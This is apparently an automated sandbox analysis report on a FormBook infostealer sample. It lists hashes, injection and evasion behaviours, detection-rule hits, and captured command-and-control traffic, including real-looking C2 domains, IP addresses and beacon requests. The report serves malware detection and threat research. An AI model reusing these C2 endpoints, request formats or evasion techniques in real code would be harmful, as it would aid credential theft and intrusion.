
Windows Analysis Report
new.exe

Overview

General Information

Sample name: new.exe
Analysis ID: 1574502
MD5: 8b86502f8b81e3335c1f4906c8acb9f7
SHA1: ac9ef49458da3e4075389da3f77ff001f0736852
SHA256: 4e1cfeb2023e96da3293df25bc81b3c51f2852eefb0cdfa4a17dc77b65da7c8f
Tags: exe, Formbook, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • new.exe (PID: 3644 cmdline: "C:\Users\user\Desktop\new.exe" MD5: 8B86502F8B81E3335C1F4906C8ACB9F7)
    • svchost.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\new.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • lxdvPfMVsD.exe (PID: 2540 cmdline: "C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cttune.exe (PID: 8012 cmdline: "C:\Windows\SysWOW64\cttune.exe" MD5: E515AF722F75E1A5708B532FAA483333)
          • lxdvPfMVsD.exe (PID: 2592 cmdline: "C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6972 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
            Source | Rule | Description | Author | Strings
            7.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
            7.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\new.exe", CommandLine: "C:\Users\user\Desktop\new.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\new.exe", ParentImage: C:\Users\user\Desktop\new.exe, ParentProcessId: 3644, ParentProcessName: new.exe, ProcessCommandLine: "C:\Users\user\Desktop\new.exe", ProcessId: 7664, ProcessName: svchost.exe
                Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\new.exe", CommandLine: "C:\Users\user\Desktop\new.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\new.exe", ParentImage: C:\Users\user\Desktop\new.exe, ParentProcessId: 3644, ParentProcessName: new.exe, ProcessCommandLine: "C:\Users\user\Desktop\new.exe", ProcessId: 7664, ProcessName: svchost.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-13T11:41:00.998018+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.10 | 49918 | 192.197.113.112 | 80 | TCP


                AV Detection

                Source: new.exe; ReversingLabs: Detection: 44%
                Source: Yara match; File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                Source: new.exe; Joe Sandbox ML: detected
                Source: new.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: cttune.pdb source: svchost.exe, 00000007.00000003.1862395988.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1862245466.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532019922.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: svchost.exe, 00000007.00000003.1862395988.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1862245466.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532019922.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lxdvPfMVsD.exe, 00000009.00000000.1792072950.000000000075E000.00000002.00000001.01000000.00000005.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2530028871.000000000075E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: new.exe, 00000005.00000003.1306017136.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, new.exe, 00000005.00000003.1304500042.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1772921153.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1771135738.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.0000000003400000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.000000000501E000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1893364758.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1895894660.0000000004CD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: new.exe, 00000005.00000003.1306017136.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, new.exe, 00000005.00000003.1304500042.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1893866437.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1772921153.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1771135738.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.0000000003400000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.000000000501E000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1893364758.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1895894660.0000000004CD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: cttune.exe, 0000000A.00000002.2535844419.00000000054AC000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.0000000002FCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2186439933.000000002945C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: cttune.exe, 0000000A.00000002.2535844419.00000000054AC000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.0000000002FCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2186439933.000000002945C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C2445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00C2445A
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C2C6D1 FindFirstFileW,FindClose,5_2_00C2C6D1
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C2C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00C2C75C
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C2EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C2EF95
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C2F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C2F0F2
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C2F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C2F3F3
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C237EF
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C23B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C23B12
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C2BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C2BCBC

                Networking

                Source: Network traffic; Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.10:49918 -> 192.197.113.112:80
                Source: DNS query: www.tabyscooterrentals.xyz
                Source: Joe Sandbox View; IP Address: 194.9.94.86
                Source: Joe Sandbox View; IP Address: 199.59.243.227
                Source: Joe Sandbox View; ASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\new.exe; Code function: 5_2_00C322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,5_2_00C322EE
                Source: global traffic; HTTP traffic detected:
                    GET /4wxo/?Hn=lLPdJfWx2zHd-riP&6hzlp=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npN1S+mAenC5poxe7lGbUmU2Ideml9w== HTTP/1.1
                    Accept: */*
                    Accept-Language: en-US
                    Connection: close
                    Host: www.tabyscooterrentals.xyz
                    User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global traffic; HTTP traffic detected:
                    GET /8cvl/?6hzlp=7z1tMIVVCeOFn4uxK5mz1jwV68wJ7YplGsn8T3mfCMtY7lZDnOfrQMvWs9v0B15OwhJf1ztMzreoSzqDQfzwDL0bb93UG8uYJWkhP+xaRe/kLZVaBg==&Hn=lLPdJfWx2zHd-riP HTTP/1.1
                    Accept: */*
                    Accept-Language: en-US
                    Connection: close
                    Host: www.ftaane.net
                    User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global traffic; HTTP traffic detected:
                    GET /2j93/?Hn=lLPdJfWx2zHd-riP&6hzlp=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt633rnN+WFzamPt7emOGov712MsYpmA== HTTP/1.1
                    Accept: */*
                    Accept-Language: en-US
                    Connection: close
                    Host: www.milp.store
                    User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global traffic; DNS traffic detected: DNS query: www.tabyscooterrentals.xyz
                Source: global traffic; DNS traffic detected: DNS query: www.ftaane.net
                Source: global traffic; DNS traffic detected: DNS query: www.milp.store
                Source: global traffic; DNS traffic detected: DNS query: www.vavada-official.buzz
                Source: unknown; HTTP traffic detected:
                    POST /8cvl/ HTTP/1.1
                    Accept: */*
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: max-age=0
                    Content-Length: 194
                    Connection: close
                    Host: www.ftaane.net
                    Origin: http://www.ftaane.net
                    Referer: http://www.ftaane.net/8cvl/
                    User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                    Data Raw: 36 68 7a 6c 70 3d 32 78 64 4e 50 38 78 69 50 75 75 6d 6a 72 54 4f 56 39 75 31 38 31 55 45 32 4f 55 4b 39 2b 5a 6b 50 66 48 38 63 47 47 68 48 2b 45 47 2b 31 52 6a 68 39 57 59 56 73 71 6e 69 4e 33 70 41 58 6b 79 2b 69 46 65 2b 41 45 69 6f 35 69 58 4a 78 4b 54 46 76 72 6b 4c 4a 46 74 4f 4a 6a 36 4c 4d 75 73 46 69 4d 46 50 61 30 4e 50 5a 6a 4e 45 5a 78 52 61 48 2f 62 70 56 32 67 33 74 2b 6e 64 35 78 48 2f 53 71 45 35 35 4c 34 68 68 79 38 56 63 37 4b 4f 54 79 47 30 32 55 68 6e 62 57 77 69 5a 30 4d 72 6a 74 32 79 6d 67 72 2b 4f 33 6c 71 64 6e 50 52 4d 55 52 54 43 4a 74 6f 64 6c 46
                    Data Ascii: 6hzlp=2xdNP8xiPuumjrTOV9u181UE2OUK9+ZkPfH8cGGhH+EG+1Rjh9WYVsqniN3pAXky+iFe+AEio5iXJxKTFvrkLJFtOJj6LMusFiMFPa0NPZjNEZxRaH/bpV2g3t+nd5xH/SqE55L4hhy8Vc7KOTyG02UhnbWwiZ0Mrjt2ymgr+O3lqdnPRMURTCJtodlF
                Source: global traffic; HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx/1.14.1
                    Date: Fri, 13 Dec 2024 10:40:39 GMT
                    Content-Length: 0
                    Connection: close
                    X-Rate-Limit-Limit: 5s
                    X-Rate-Limit-Remaining: 19
                    X-Rate-Limit-Reset: 2024-12-13T10:40:44.5161501Z
                Source: global traffic; HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Fri, 13 Dec 2024 10:40:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Vary: Accept-Encoding
                    X-Powered-By: PHP/7.4.33
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
                Source: global traffic; HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Fri, 13 Dec 2024 10:41:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Vary: Accept-Encoding
                    X-Powered-By: PHP/7.4.33
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
                Source: global traffic; HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Fri, 13 Dec 2024 10:41:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Vary: Accept-Encoding
                    X-Powered-By: PHP/7.4.33
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
                Source: global traffic; HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Fri, 13 Dec 2024 10:41:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Vary: Accept-Encoding
                    X-Powered-By: PHP/7.4.33
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: lxdvPfMVsD.exe, 0000000D.00000002.2535533484.00000000054AB000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.vavada-official.buzz
                Source: lxdvPfMVsD.exe, 0000000D.00000002.2535533484.00000000054AB000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.vavada-official.buzz/emhd/
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srf&l
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cttune.exe, 0000000A.00000003.2076008864.0000000007F55000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
